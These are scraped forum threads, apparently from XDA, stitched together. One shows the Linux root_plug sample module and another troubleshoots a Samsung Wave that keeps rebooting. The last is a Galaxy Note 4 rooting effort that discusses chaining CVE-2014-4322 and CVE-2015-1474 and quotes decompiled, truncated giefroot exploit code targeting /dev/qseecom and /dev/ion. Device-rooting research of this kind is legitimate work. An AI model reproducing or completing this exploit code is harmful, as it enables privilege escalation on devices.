Related
Not sure if this means anything, just throwing it out there, but i was going through file for froyo on the evo, original file name "supersonic-2.6.32.15-g746f4f0.tar" and found a file named root_plug-notepad, now i'm only guessing, but is this how they are blocking us from being able to root our device, or am i just guessing outta my arse.
on the notepad the full content is:
/*
* Root Plug sample LSM module
*
* Originally written for a Linux Journal.
*
* Copyright (C) 2002 Greg Kroah-Hartman
*
* Prevents any programs running with egid == 0 if a specific USB device
* is not present in the system. Yes, it can be gotten around, but is a
* nice starting point for people to play with, and learn the LSM
* interface.
*
* If you want to turn this into something with a semblance of security,
* you need to hook the task_* functions also.
*
* See for more information
* about this code.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation, version 2 of the
* License.
*/
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/security.h>
#include <linux/usb.h>
#include <linux/moduleparam.h>
/* default is a generic type of usb to serial converter */
static int vendor_id = 0x0557;
static int product_id = 0x2008;
module_param(vendor_id, uint, 0400);
module_param(product_id, uint, 0400);
/* should we print out debug messages */
static int debug = 0;
module_param(debug, bool, 0600);
#define MY_NAME "root_plug"
#define root_dbg(fmt, arg...) \
do { \
if (debug) \
printk(KERN_DEBUG "%s: %s: " fmt , \
MY_NAME , __func__ , \
## arg); \
} while (0)
static int rootplug_bprm_check_security (struct linux_binprm *bprm)
{
struct usb_device *dev;
root_dbg("file %s, e_uid = %d, e_gid = %d\n",
bprm->filename, bprm->cred->euid, bprm->cred->egid);
if (bprm->cred->egid == 0) {
dev = usb_find_device(vendor_id, product_id);
if (!dev) {
root_dbg("e_gid = 0, and device not found, "
"task not allowed to run...\n");
return -EPERM;
}
usb_put_dev(dev);
}
return 0;
}
static struct security_operations rootplug_security_ops = {
.bprm_check_security = rootplug_bprm_check_security,
};
static int __init rootplug_init (void)
{
/* register ourselves with the security framework */
if (register_security (&rootplug_security_ops)) {
printk (KERN_INFO
"Failure registering Root Plug module with the kernel\n");
return -EINVAL;
}
printk (KERN_INFO "Root Plug module initialized, "
"vendor_id = %4.4x, product id = %4.4x\n", vendor_id, product_id);
return 0;
}
security_initcall (rootplug_init);
nobody, nothing, someone has to have some sort of input, lol.
pubbs.net/200910/kernel/36760-patchrfc-security-remove-rootplug.html
Uncle jimmy says hello
Hey Bada Users
I own Samsung GT-S8500, great phone, fast, smooth, nice camera, expecialy HD 720p VIDEO.
But my phone keeps restarting every 20-30MIN itself, while i doing something, like browsing internet, playing music etc....
I have installed few ROM, BADA 2.0, BADA 1.2, but allways the same problem.. restarting..
Can solutio be getting '' android '' on my device or something code that can fix this?
And which android ROM doesnt have '' modem '' bug and fully working network?
Thanks
It is a problem with the power module. Also my father's wave have this problem. (Not every 30 min but every 1-2 hours)
Sent from my GT-I9500 using Tapatalk 4 Beta
how to fix it?
If warranty is still valid use it. If not, you can't do anything. Is an hardware problem
Sent from my GT-I9500 using Tapatalk 4 Beta
Alberto96 said:
If warranty is still valid use it. If not, you can't do anything. Is an hardware problem
Sent from my GT-I9500 using Tapatalk 4 Beta
Click to expand...
Click to collapse
no warranty, i really need some fix, software or anything,,,,
No software fix available. The only solution is a new motherboard
Sent from my GT-I9500 using Tapatalk 4 Beta
i can get motherboard for 10$, but theres no samsung care center in my country, and its to expensive... why i need complet motherboard, when the problem is only in power modul?
You could try to find hint about your problem.
Set Debug Level to High...
Enter:
*#33284*#
Post Bluescreen here...
To leave Screen Upload data to pc. Press and hold END Key for few seconds... or use this Tool:
http://forum.xda-developers.com/showthread.php?t=1176189
RAM dump eXtractor
Best Regards
adfree said:
You could try to find hint about your problem.
Set Debug Level to High...
Enter:
*#33284*#
Post Bluescreen here...
To leave Screen Upload data to pc. Press and hold END Key for few seconds... or use this Tool:
http://forum.xda-developers.com/showthread.php?t=1176189
RAM dump eXtractor
Best Regards
Click to expand...
Click to collapse
Well i get blue screen, but i cant upload it to PC!
So addfree, what do you thing i suggest to do now? ( no warranty, no samsung care center )
Can i solve this by opening phone myself, or some software or code ( like setting low debug mode ) to fix this?
Could maybe android NaND or FnF solve this problem?
If i send you bluescreen INF, can you tell me whats wrong with my phone, and send me a fix or?
If i send you bluescreen INF, can you tell me whats wrong with my phone, and send me a fix or?
Click to expand...
Click to collapse
Without Screenshot/Photo or RamDump_Information(BS_DoubleFault).txt I have NO idea...
Sometimes it is possible, that Ram Dump eXtractor not detect handset...
But if, then it is easier... example:
Code:
Modem:Q6270B-KPRBL-1.5.45T
SHP:VPP R5 2.1.1
Build Host:S1-AGENT01
BuildAt:2010/05/12 01:04:23
App Debug Level : 0
ASSERTION_ASSERT:0 failed. (fi
le SysSecureBoot.c, line 3868)
BoAn3868
<Callstack information>
PC = 4010B063 OemDumpRegister
LR = 4010B067 OemDumpRegister
<Mocha Task Callstack>
_SysAssertReport
__SysSecBootReadNetLockInfoFro
mFile
If IMEI is not set...
What shows your Bluescreen?
Best Regards
adfree said:
Without Screenshot/Photo or RamDump_Information(BS_DoubleFault).txt I have NO idea...
Sometimes it is possible, that Ram Dump eXtractor not detect handset...
But if, then it is easier... example:
Code:
Modem:Q6270B-KPRBL-1.5.45T
SHP:VPP R5 2.1.1
Build Host:S1-AGENT01
BuildAt:2010/05/12 01:04:23
App Debug Level : 0
ASSERTION_ASSERT:0 failed. (fi
le SysSecureBoot.c, line 3868)
BoAn3868
<Callstack information>
PC = 4010B063 OemDumpRegister
LR = 4010B067 OemDumpRegister
<Mocha Task Callstack>
_SysAssertReport
__SysSecBootReadNetLockInfoFro
mFile
If IMEI is not set...
What shows your Bluescreen?
Best Regards
Click to expand...
Click to collapse
S/W version: S8530+BO+LD1
Modem: Q6270B-KPRBL-1.5. 45T
SHP: VPP R5 2. 1. 1
Build Host: S1-AGENT08
BuildAt: 2013/03/05 17:19:24
App Debug Level: 0
ASSERTI ON_ASSERT: FALSE failed
( file SysECOM c, line 81 )
Ecom V2 Assert : Allocated App
( symbol size [ EventMgr: 100 ] is
lesser than Given Symb [ 146:
Wml sEventHandl er Valid ] n
< Callstack information>
PC = 4031B42B OemDupmRegister
LR = 4031B42F OemDumpRegister
<Mocha tast callstack>
_ SysAssertReport
This i write manually, and theres 7 more pages, should i write them all? ( This is the 1st page that i write )
And why S/W version is: s8530+BO+LD1 when my device is s8500 wave?
And yes, now i have Bada 2.0, Turko SF latest version, and now its not rebooting so often like on other softwares, why's that?
As Template...
Code:
ALL HW Information:
HW VERSION : S8500_REV07
IMEI VERSION : Not Active
RF CAL DATE : Not Active
Bad Block Information:
nNumBMPs : 0
nAge : 0
Run Time Bad Block Occurred :
Init BMPs = [COLOR="Red"][B]1[/B][/COLOR], Current BMPs =
0
You could check if your OneNAND memory is okay, or have damaged blocks...
No need to post more infos.
For now I have no real idea... need to investigate for SysECOM.
Best Regards
adfree said:
As Template...
Code:
ALL HW Information:
HW VERSION : S8500_REV07
IMEI VERSION : Not Active
RF CAL DATE : Not Active
Bad Block Information:
nNumBMPs : 0
nAge : 0
Run Time Bad Block Occurred :
Init BMPs = [COLOR="Red"][B]1[/B][/COLOR], Current BMPs =
0
You could check if your OneNAND memory is okay, or have damaged blocks...
No need to post more infos.
For now I have no real idea... need to investigate for SysECOM.
Best Regards
Click to expand...
Click to collapse
Can you suggest me what to do?
how to chech OneNAND or damaged blocks?
whats with SysECOM, you are only one who can help me now.
...and theres 7 more pages...
Click to expand...
Click to collapse
Navigate with Keys on left side... + or -
HOLD +
Otherwise you jump between 2 pages... Then check again for this request:
http://forum.xda-developers.com/showpost.php?p=41853793&postcount=12
About SysECOM.c ... you can find it in apps_compressed.bin... or Google result:
SysEcom.h from GT-S5230_S5233_S5600.zip
Code:
/*
* Samsung Handset Platform
* Copyright (c) 2000 Software Center, Samsung Electronics, Inc.
* All rights reserved.
*
* This software is the confidential and proprietary information
* of Samsung Electronics, Inc. ("Confidential Information"). You
* shall not disclose such Confidential Information and shall use
* it only in accordance with the terms of the license agreement
* you entered into with Samsung Electronics.
*/
/*:Associate with "Embedded COM" */
#ifndef _SYS_ECOM_H_
#define _SYS_ECOM_H_
#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
#include "ShpTypes.h"
typedef UINT32 ECOMCLSID;
#define ECOM_VTBL(name) name
#define ECOM_INTERFACE(name) \
struct _##name {\
struct ECOM_VTBL(name)* pVtbl;\
};\
typedef struct ECOM_VTBL(name) ECOM_VTBL(name);\
struct ECOM_VTBL(name)
typedef BOOL (*EcomDispatch)(UINT32 action, ULONG param1, ULONG param2, void* pParam3);
#define DECLARE_EBASE() \
UINT32 (*AddRef) (void);\
UINT32 (*Release) (void);\
BOOL (*Dispatch)(UINT32 action, ULONG param1, ULONG param2, void* pParam3);
#define DECLARE_ECOM_VTBL(name) name* pVtbl##name; \
ADDR sb;
typedef struct
{
void* pClass;
ADDR sb;
} EcomType;
#define GET_ECOM_PVTBL(p, name) ((struct _##name*)p)->pVtbl
#define SysGetVtbl(compID, compName) (((T##compName*)(pDllBaseEcomFactory[compID-CID_BASE].pClass))->pVtblE##compName)
#define SysGetSb(compID) (((EcomType*)(pDllBaseEcomFactory[compID-CID_BASE].pClass))->sb)
#define INIT_ECOM_VTBL(p, name, vt) (GET_ECOM_PVTBL(p, name) = (ECOM_VTBL(name)*)&vt)
/*
* EBase Definition
*/
ECOM_INTERFACE(EBase)
{
DECLARE_EBASE()
};
#define EBaseAddRef(p) GET_ECOM_PVTBL(p, EBase)->AddRef()
#define EBaseRelease(p) GET_ECOM_PVTBL(p, EBase)->Release()
/*
* EComp Interface
*/
ECOM_INTERFACE(EComp)
{
DECLARE_EBASE()
BOOL (*Create)(EComp* pEComp, ECOMCLSID clsID, void** ppObj);
void (*Destroy)(EComp* pEComp);
};
#define ECompAddRef(p) GET_ECOM_PVTBL(p, EComp)->AddRef()
#define ECompRelease(p) GET_ECOM_PVTBL(p, EComp)->Release()
#define ECompCreate(p,id,ppo) GET_ECOM_PVTBL(p, EComp)->Create(id,ppo)
#define ECompDestroy(p) GET_ECOM_PVTBL(p, EComp)->Destroy()
typedef struct _EcomClass EcomClass;
struct _EcomClass
{
void* pData; // Private data
EcomClass* pNextObj; // Pointer to next class in the list
ECOMCLSID clsID; // Class information
};
typedef struct _EcomComp
{
DECLARE_ECOM_VTBL(EComp)
UINT32 refCount;
EcomClass* pObjList;
BOOL (*Create)(EComp* pEComp, ECOMCLSID clsID, void** ppObj);
void (*Destroy)(EComp* pEComp);
} EcomComp;
typedef struct
{
ECOMCLSID clsID;
void* pClass;
} EcomFactory;
extern EcomFactory* pDllBaseEcomFactory;
extern ADDR dllBaseSb;
#ifdef __cplusplus
}
#endif /* __cplusplus */
#endif // _SYS_ECOM_H_
Hmmm...
Is your Wave used or bought from used condition...
Is your Wave repaired or Unlocked by some magic box ?
Best Regards
Edit 1.
Google result...
http://forum.xda-developers.com/showpost.php?p=40393606&postcount=6
Here I can see 2 damaged blocks...
Btw... Check to remove your SIM Card... maybe then more then 30 minutes stable...
Edit 2.
http://forum.xda-developers.com/showpost.php?p=19496159&postcount=31
Okay, seems features of SysECOM.c wide range... Embedded COM
adfree said:
Navigate with Keys on left side... + or -
HOLD +
Otherwise you jump between 2 pages... Then check again for this request:
http://forum.xda-developers.com/showpost.php?p=41853793&postcount=12
About SysECOM.c ... you can find it in apps_compressed.bin... or Google result:
SysEcom.h from GT-S5230_S5233_S5600.zip
Code:
/*
* Samsung Handset Platform
* Copyright (c) 2000 Software Center, Samsung Electronics, Inc.
* All rights reserved.
*
* This software is the confidential and proprietary information
* of Samsung Electronics, Inc. ("Confidential Information"). You
* shall not disclose such Confidential Information and shall use
* it only in accordance with the terms of the license agreement
* you entered into with Samsung Electronics.
*/
/*:Associate with "Embedded COM" */
#ifndef _SYS_ECOM_H_
#define _SYS_ECOM_H_
#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
#include "ShpTypes.h"
typedef UINT32 ECOMCLSID;
#define ECOM_VTBL(name) name
#define ECOM_INTERFACE(name) \
struct _##name {\
struct ECOM_VTBL(name)* pVtbl;\
};\
typedef struct ECOM_VTBL(name) ECOM_VTBL(name);\
struct ECOM_VTBL(name)
typedef BOOL (*EcomDispatch)(UINT32 action, ULONG param1, ULONG param2, void* pParam3);
#define DECLARE_EBASE() \
UINT32 (*AddRef) (void);\
UINT32 (*Release) (void);\
BOOL (*Dispatch)(UINT32 action, ULONG param1, ULONG param2, void* pParam3);
#define DECLARE_ECOM_VTBL(name) name* pVtbl##name; \
ADDR sb;
typedef struct
{
void* pClass;
ADDR sb;
} EcomType;
#define GET_ECOM_PVTBL(p, name) ((struct _##name*)p)->pVtbl
#define SysGetVtbl(compID, compName) (((T##compName*)(pDllBaseEcomFactory[compID-CID_BASE].pClass))->pVtblE##compName)
#define SysGetSb(compID) (((EcomType*)(pDllBaseEcomFactory[compID-CID_BASE].pClass))->sb)
#define INIT_ECOM_VTBL(p, name, vt) (GET_ECOM_PVTBL(p, name) = (ECOM_VTBL(name)*)&vt)
/*
* EBase Definition
*/
ECOM_INTERFACE(EBase)
{
DECLARE_EBASE()
};
#define EBaseAddRef(p) GET_ECOM_PVTBL(p, EBase)->AddRef()
#define EBaseRelease(p) GET_ECOM_PVTBL(p, EBase)->Release()
/*
* EComp Interface
*/
ECOM_INTERFACE(EComp)
{
DECLARE_EBASE()
BOOL (*Create)(EComp* pEComp, ECOMCLSID clsID, void** ppObj);
void (*Destroy)(EComp* pEComp);
};
#define ECompAddRef(p) GET_ECOM_PVTBL(p, EComp)->AddRef()
#define ECompRelease(p) GET_ECOM_PVTBL(p, EComp)->Release()
#define ECompCreate(p,id,ppo) GET_ECOM_PVTBL(p, EComp)->Create(id,ppo)
#define ECompDestroy(p) GET_ECOM_PVTBL(p, EComp)->Destroy()
typedef struct _EcomClass EcomClass;
struct _EcomClass
{
void* pData; // Private data
EcomClass* pNextObj; // Pointer to next class in the list
ECOMCLSID clsID; // Class information
};
typedef struct _EcomComp
{
DECLARE_ECOM_VTBL(EComp)
UINT32 refCount;
EcomClass* pObjList;
BOOL (*Create)(EComp* pEComp, ECOMCLSID clsID, void** ppObj);
void (*Destroy)(EComp* pEComp);
} EcomComp;
typedef struct
{
ECOMCLSID clsID;
void* pClass;
} EcomFactory;
extern EcomFactory* pDllBaseEcomFactory;
extern ADDR dllBaseSb;
#ifdef __cplusplus
}
#endif /* __cplusplus */
#endif // _SYS_ECOM_H_
Hmmm...
Is your Wave used or bought from used condition...
Is your Wave repaired or Unlocked by some magic box ?
Best Regards
Edit 1.
Google result...
http://forum.xda-developers.com/showpost.php?p=40393606&postcount=6
Here I can see 2 damaged blocks...
Btw... Check to remove your SIM Card... maybe then more then 30 minutes stable...
Edit 2.
http://forum.xda-developers.com/showpost.php?p=19496159&postcount=31
Okay, seems features of SysECOM.c wide range... Embedded COM
Click to expand...
Click to collapse
What can i do, how can i fix it?
Best Regards
Can i solve this by opening phone myself, or some software or code ( like setting low debug mode ) to fix this?
Could maybe android NaND or FnF solve this problem?
Click to expand...
Click to collapse
You can only try to identify problem... then maybe cheap solution.
Maybe it is Hardware, maybe it is Software problem...
Bluescreen message about SysECOM.c ...
I have NO idea, what exactly this means abour your Wave...
You could try to install Android...
http://forum.xda-developers.com/showthread.php?t=1851818
If it also restart/shut down... then 88,88 % Hardwaretrouble...
Again, your Wave shows damaged blocks?
Yes or no ?
Easy task.
http://forum.xda-developers.com/showpost.php?p=41853793&postcount=12
Next Bluescreen, navigate to site/page 2 and read info...
Best Regards
adfree said:
You can only try to identify problem... then maybe cheap solution.
Maybe it is Hardware, maybe it is Software problem...
Bluescreen message about SysECOM.c ...
I have NO idea, what exactly this means abour your Wave...
You could try to install Android...
http://forum.xda-developers.com/showthread.php?t=1851818
If it also restart/shut down... then 88,88 % Hardwaretrouble...
Again, your Wave shows damaged blocks?
Yes or no ?
Easy task.
http://forum.xda-developers.com/showpost.php?p=41853793&postcount=12
Next Bluescreen, navigate to site/page 2 and read info...
Best Regards
Click to expand...
Click to collapse
Again im set high debug level, and yes, i get bad block information.
Bad Block Information:
nNumBMPs: 0
nAge: 0
Run Time Bas Block Occurred:
I ni t BMPs = 2, Currect BMPs= 0
What does this mean?
What does this mean?
Click to expand...
Click to collapse
Good Question...
0 bada blocks could be 100 % perfect.
My S8500 test device with broken Display and attached with soldered wires to my RIFF JTAG Box works with some minor problems...
Not all things tested/used... because my SIM Cards are not active...
So no Calls, SMS etc...
http://forum.xda-developers.com/showpost.php?p=13582911&postcount=13
With JTAG I can see the address where the bad block is located...
Here my Thread about bad blocks...
http://forum.xda-developers.com/showthread.php?p=42030607#post42030607
Maybe if more users could check about bada blocks and problems of their Waves...
Its like defect clusters in PC world...
If your Harddisk is damaged... with bad clusters...
A.
You can try to """Low Level Format"""... but this ""dangerous""...
Risk of data loss sooon or in future is much higher...
B.
Replace HD by new one...
Same for your Wave... maybe the 2 bad blocks are ignorable...
But maybe this is one more sign, that your Hardware is not 100 % okay...
One more scenario...
I have NO idea about your country... nor about your Wave, if it is from Operator... Branding...
With Serial Number S/N under your battery you can check with Kies, which Firmware is exactly for your Wave...
Because it seems few Differences for different countries and mixed Firmware can cause in some sideeffects/problems...
http://forum.xda-developers.com/showpost.php?p=36482821&postcount=315
Check Firmware from Kies...
Best Regards
adfree said:
Good Question...
0 bada blocks could be 100 % perfect.
My S8500 test device with broken Display and attached with soldered wires to my RIFF JTAG Box works with some minor problems...
Not all things tested/used... because my SIM Cards are not active...
So no Calls, SMS etc...
http://forum.xda-developers.com/showpost.php?p=13582911&postcount=13
With JTAG I can see the address where the bad block is located...
Here my Thread about bad blocks...
http://forum.xda-developers.com/showthread.php?p=42030607#post42030607
Maybe if more users could check about bada blocks and problems of their Waves...
Its like defect clusters in PC world...
If your Harddisk is damaged... with bad clusters...
A.
You can try to """Low Level Format"""... but this ""dangerous""...
Risk of data loss sooon or in future is much higher...
B.
Replace HD by new one...
Same for your Wave... maybe the 2 bad blocks are ignorable...
But maybe this is one more sign, that your Hardware is not 100 % okay...
One more scenario...
I have NO idea about your country... nor about your Wave, if it is from Operator... Branding...
With Serial Number S/N under your battery you can check with Kies, which Firmware is exactly for your Wave...
Because it seems few Differences for different countries and mixed Firmware can cause in some sideeffects/problems...
http://forum.xda-developers.com/showpost.php?p=36482821&postcount=315
Check Firmware from Kies...
Best Regards
Click to expand...
Click to collapse
A.
How to do Low Level Format, guide?
B.
How can i replace HD by new one?
C.
My country is Bosnia And Hercegovina, not from operator, i bought it from used condition. I will try this.
Galaxy3HELL said:
A.
How to do Low Level Format, guide?
B.
How can i replace HD by new one?
C.
My country is Bosnia And Hercegovina, not from operator, i bought it from used condition. I will try this.
Click to expand...
Click to collapse
Brate,sto jednostavno ne probas android,ako i tamo zeza,onda je harver upitanju..
WelcomeFirst I have to ask that everyone please follow the rules when posting in here.The last thread was shut down due to people getting off topic so let's stay on track here, if you have a question that you'd like to ask and are unsure if it belongs here then simply PM me and I'll help. In order to get things going I've added a simple FAQ below for people who may not be up to speed.
Q: What's needed to root the N910A/N910V?
A: A kernel exploit and an Android OS exploit.
Q: What's the current status?
A: We have a kernel exploit that will work for us and the method to implement it. Our next goal is to apply an Android exploit which will grant us System UID in order to apply our kernel exploit and write root.
Q: What exploit are we using for the kernel side?
A. The exploit will be the work of @zxz0O0 and is based off of CVE-2014-4322. This is confirmed NOT patched by Samsung.
Q: What exploit are we using for Android side?
A. Current target is CVE-2015-1474. We've explored a previous exploit which has proven to work for the Sony Z3 (CVE-2014-7911), but unfortunately Samsung fixed this prior to releasing our devices.
Current Focus - Creating an APK that will exploit CVE-2015-1474 to elevate us to System UID. This is where we are at this current time. We will need a crafty Dev to come up with such APK. I am a novice when it comes to scripting and exploiting but in my free time I've been soaking up as much information as I possibly can to help in the future.
.
Working on PoC here:
https://github.com/p1gl3t/CVE-2015-1474_poc
Other Threads working on 2015-1474
http://forum.xda-developers.com/kin...luating-cve-2015-1474-to-escalate-to-t3045163
android-DEP said:
@ZPaul2Fresh8 confirmed that CVE-2014-4322 (qseecom) is fixed in N910AUCU1BNK3 but it might not be in N910AUCU1ANIE.
Click to expand...
Click to collapse
To clarify, CVE-2014-4322 is NOT patched in ANY baseband version on our devices. CVE-2014-7911 is the patched.
munjeni said:
Its not obfuscated if you think about file called "main"! It is 7z archive but removed first 2 bytes "7z" or hex "377A", just simple open "main" file with hex editor and append 2 bytes 37 7A to the start of the file and save them! It is password protected 7z archive and you must research for password in asembly if you think to open them with 7z I stil have no idea what is purpose of these "main" file (malware?) when there is another one "main" file (tar.gz) which is extracted when you execute file "a", but I know thats a two diferent "main" files!
Click to expand...
Click to collapse
From @idler1984 , here's the explanation of the 'a' and 'main' files. HERE.
jorgasm209 said:
Not sure how to prove something that isn't there... hard to prove a negative. APK is claiming not vulnerable even with the apparent absence of checkAndGetTcObjectClass in the firmware. Someone much smarter than me can attempt to find out why My bet is on @android-DEP ... see post above regarding ServiceExploitActivity.java.
Click to expand...
Click to collapse
It's been confirmed by me that exploit CVE-2014-7911 has been patched in the latest OTA (NK3 on AT&T) and I believe @zxz0O0 confirmed it on the earlier baseband too. If you're in doubt and you're running the earlier build, just go to system/framework/core.odex and you'll find the function is located there...
Now if you're just skimming through here let me catch everyone up to speed here;
At this point in order to achieve root for our devices we will need a combination of exploits. There are a ton of CVE's being thrown and I can see why people are getting confused so I'll try to make it easier to understand. I'll break it down by CVE #.
CVE-2014-7911 - Patched so it doesn't matter. Android OS exploit to gain System UID. Not Root
CVE-2014-8609 - Android OS exploit. Possibly our next venture for gaining System UID, I've been told otherwise. Another vulnerability exists that may be easier. CVE-2015-1474
CVE-2014-4322 - Kernel exploit. Un-patched. Used to get Root while in System status.
So we need an exploit to get us System status and from there we pretty much have CVE-2014-4322 exploit to get Root from there.
Now, you may have read about Root solutions such as geifroot & 2014-79xx but forget about them because they are all based on Team Keen's exploit of CVE-2014-7911 which we confirmed has been backported and patched from day 1 on our devices. So in order to proceed we need a new exploit to get System status first... that vulnerability may be 2015-1474....
ZPaul2Fresh8, thanks for this write up. Finally someone who has understood the situation. I'm not really experienced in Java but I believe CVE-2014-8609 will not be useful. This exploit is for broadcasting actions to apps (e.g. dialing), not executing shell commands or binaries.
zxz0O0 said:
ZPaul2Fresh8, thanks for this write up. Finally someone who has understood the situation. I'm not really experienced in Java but I believe CVE-2014-8609 will not be useful. This exploit is for broadcasting actions to apps (e.g. dialing), not executing shell commands or binaries.
Click to expand...
Click to collapse
I understand, but what are the possible Broadcasts at our disposal? Whatever broadcast we send will be of System UID so maybe we can find something if we look hard enough?
I have Liang Chen (Team Keen (http://en.wikipedia.org/wiki/Pwn2Own#Contest_2014)) looking into CVE-2014-8609 to see if we can achieve System UID.
munjeni said:
Guys, CVE-2014-4322 root exploit from retme7 is not working, it need a lot of modifications, I am working on this 3 days and I am on 90 percent of luck, I am now stuck with this -> http://forum.xda-developers.com/showpost.php?p=58460530&postcount=1171
If you have idea for how I can change app_id than I will get it working and will share source with you!
This is decompiled source from guy who have it working and don't want to share them:
Code:
void sub_89F4(void) {
;
}
int __fastcall sub_8A78(signed int a1, int a2)
{
signed int v2; // [email protected]
FILE *v3; // [email protected]
void *v4; // [email protected]
signed int v5; // [email protected]
FILE *v6; // [email protected]
int v7; // [email protected]
char v8; // [email protected]
const char *v9; // [email protected]
_UNKNOWN *v10; // [email protected]
_UNKNOWN *v11; // [email protected]
char **v12; // [email protected]
const char *v13; // [email protected]
int result; // [email protected]
int ion_fd; // [email protected]
int v16; // [email protected]
int v17; // [email protected]
int *v18; // [email protected]
char *v19; // [email protected]
int v20; // [email protected]
int qseecom_fd; // [email protected]
int v22; // [email protected]
int v23; // [email protected]
int v24; // [email protected]
int *v25; // [email protected]
char *v26; // [email protected]
int *v27; // [email protected]
int v28; // [email protected]
int v29; // [email protected]
int v30; // [email protected]
int v31; // [email protected]
int v32; // [email protected]
int v33; // [email protected]
int v34; // [email protected]
int v35; // [email protected]
int *v36; // [email protected]
int v37; // [email protected]
int v38; // [email protected]
int v39; // [email protected]
int v40; // [email protected]
int *v41; // [email protected]
int v42; // [email protected]
int v43; // [email protected]
void *v44; // [email protected]7
int v45; // [email protected]
int v46; // [email protected]
unsigned int v47; // [email protected]
int v48; // [email protected]
int v49; // [email protected]
int v50; // [email protected]
int *v51; // [email protected]
int ptmx_fd; // [email protected]
int v53; // [email protected]
int v54; // [email protected]
int v55; // [email protected]
int v56; // [email protected]
int *v57; // [email protected]
char *v58; // [email protected]
int v59; // [sp+Ch] [bp-1F4h]@1
int memfile_fd; // [sp+Ch] [bp-1F4h]@26
void *ion_void; // [sp+14h] [bp-1ECh]@26
int v62; // [sp+18h] [bp-1E8h]@24
int v63; // [sp+1Ch] [bp-1E4h]@38
int v64; // [sp+20h] [bp-1E0h]@38
int v65; // [sp+24h] [bp-1DCh]@38
int v66; // [sp+28h] [bp-1D8h]@38
int v67; // [sp+2Ch] [bp-1D4h]@22
int v68; // [sp+30h] [bp-1D0h]@22
int v69; // [sp+34h] [bp-1CCh]@22
int v70; // [sp+38h] [bp-1C8h]@22
int v71; // [sp+3Ch] [bp-1C4h]@24
unsigned int v72; // [sp+40h] [bp-1C0h]@41
int v73; // [sp+44h] [bp-1BCh]@41
int v74; // [sp+48h] [bp-1B8h]@41
int v75; // [sp+4Ch] [bp-1B4h]@41
int v76; // [sp+50h] [bp-1B0h]@41
unsigned int v77; // [sp+54h] [bp-1ACh]@41
int v78; // [sp+58h] [bp-1A8h]@41
int v79; // [sp+5Ch] [bp-1A4h]@41
int v80; // [sp+60h] [bp-1A0h]@41
int v81; // [sp+64h] [bp-19Ch]@41
int v82; // [sp+68h] [bp-198h]@41
int v83; // [sp+6Ch] [bp-194h]@41
char v84; // [sp+70h] [bp-190h]@4
char v85[4]; // [sp+90h] [bp-170h]@29
int v86; // [sp+94h] [bp-16Ch]@29
int v87; // [sp+98h] [bp-168h]@29
char v88; // [sp+9Ch] [bp-164h]@29
int v89; // [sp+A0h] [bp-160h]@30
int v90; // [sp+A4h] [bp-15Ch]@30
int v91; // [sp+A8h] [bp-158h]@30
int v92; // [sp+ACh] [bp-154h]@30
int v93; // [sp+B0h] [bp-150h]@30
int v94; // [sp+B4h] [bp-14Ch]@30
int v95; // [sp+B8h] [bp-148h]@30
int v96; // [sp+BCh] [bp-144h]@30
int v97; // [sp+C0h] [bp-140h]@30
int v98; // [sp+C4h] [bp-13Ch]@30
int v99; // [sp+C8h] [bp-138h]@30
int v100; // [sp+CCh] [bp-134h]@30
char v101; // [sp+D4h] [bp-12Ch]@1
int v102; // [sp+1D4h] [bp-2Ch]@1
char v103; // [sp+1D8h] [bp-28h]@4
v2 = a1;
v102 = _stack_chk_guard;
v59 = a2;
puts("giefroot (c) zxz0O0");
v3 = fopen("/proc/version", "r");
fread(&v101, 0x100u, 1u, v3);
fclose(v3);
v4 = malloc(0x100u);
v5 = 30;
v6 = fopen("/system/build.prop", "r");
do
{
while ( 1 )
{
fgets((char *)v4, 256, v6);
v7 = strncmp((const char *)v4, "ro.product.device=", 0x12u);
v8 = v7;
if ( !v7 )
break;
--v5;
if ( !v5 )
goto LABEL_5;
}
strcpy(&v84, (const char *)v4 + 18);
--v5;
*(&v103 + strlen(&v84) - 361) = v8;
}
while ( v5 );
LABEL_5:
fclose(v6);
free(v4);
v9 = supported_kernel[0];
if ( supported_kernel[0] )
{
v10 = &unk_D014;
v11 = &unk_D0A4;
v12 = (char **)unk_D0A4;
do
{
if ( !strcmp(v9, &v101) && (!v12 || !strcmp((const char *)*((int *)v10 - 4), &v84)) )
{
v12 = &supported_kernel[5 * v5];
unk_D0A4 = &supported_kernel[5 * v5];
}
v13 = *(const char **)v10;
v10 = (char *)v10 + 20;
v9 = v13;
++v5;
}
while ( v13 );
}
else
{
v11 = &unk_D0A4;
v12 = (char **)unk_D0A4;
}
if ( v12 )
{
v12 = (char **)1;
}
else
{
puts("Error: Kernel not supported");
printf("Device: %s, Kernel: %s\n", &v84, &v101);
*(int *)v11 = supported_kernel;
}
if ( v2 > 1 && !strcmp(*(const char **)(v59 + 4), "-s") )
{
result = (unsigned int)v12 ^ 1;
goto error;
}
ion_fd = open("/dev/ion", 0);
if ( ion_fd < 0 )
puts("Error opening ion device");
v67 = 256;
v68 = 4;
v69 = 134217728;
v70 = 1;
sub_89F4();
v16 = ioctl(ion_fd, ION_IOC_ALLOC, &v67);
if ( v16 )
{
v25 = (int *)((int (*)(void))_errno)();
v26 = strerror(*v25);
printf("Error ioctl: %d / %s\n", v16, v26);
}
else
{
sub_89F4();
}
v62 = v71;
v17 = ioctl(ion_fd, ION_IOC_SHARE, &v62);
if ( v17 )
{
v18 = (int *)((int (*)(void))_errno)();
v19 = strerror(*v18);
printf("Error ioctl: %d / %s\n", v17, v19);
}
else
{
sub_89F4();
}
sub_89F4();
ion_void = (void *)mmap(0, 256, 7, 1);
memset(ion_void, 255, 0x100u);
memfile_fd = open("/data/local/tmp/memfile", 2);
if ( memfile_fd < 0 )
sub_89F4();
v20 = mmap(0, 2113929216, 7, 1);
if ( v20 == -1 )
puts("mmap shared_buf failed");
qseecom_fd = open("/dev/qseecom", 0);
if ( qseccom_fd < 0 )
{
puts("Error opening qseecom");
getting_root:
close(memfile_fd);
close(ion_fd);
close(qseccom_fd);
puts("getting root...");
ptmx_fd = open("/dev/ptmx", 0);
fsync(ptmx_fd, v53);
v54 = close(ptmx_fd);
v55 = getuid(v54);
v56 = printf("getuid: %d\n", v55);
if ( getuid(v56) )
{
puts("Error getting root");
result = 1;
}
else
{
system("/data/local/tmp/systemrw.sh");
system("/data/local/tmp/installsupersu.sh");
result = 0;
}
goto error;
}
sub_89F4();
*(int *)v85 = 1769437812;
v86 = 1769366884;
v87 = 25966;
memset(&v88, 0, 0x14u);
